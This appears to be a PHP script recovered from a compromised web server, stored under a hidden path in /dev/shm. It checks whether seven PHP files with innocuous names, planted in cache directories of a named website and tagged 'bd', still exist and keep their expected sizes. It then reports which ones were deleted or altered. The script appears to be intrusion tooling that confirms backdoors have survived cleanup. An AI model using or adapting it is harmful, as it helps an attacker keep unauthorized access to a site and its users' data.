File: //dev/shm/.bind
<?php $r = '/home/httpd/html/baretube.com'; $x = ["/cache/a/0/4/5/1/function_name.php"=>"bd@@338485@@610",
"/cache/a/0/4/5/1/admin_files.php"=>"bd@@338561@@1067",
"/cache/0/4/7/3/d/help_0.php"=>"bd@@369811@@575",
"/cache/0/5/5/2/7/cb.php"=>"bd@@369826@@682",
"/cache/1/2/b/7/5/dispimgthumb.php"=>"bd@@369829@@896",
"/cache/1/4/c/2/a/help_about.php"=>"bd@@369837@@625",
"/cache/1/6/a/b/3/TAMARecord.class.php"=>"bd@@369843@@889"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');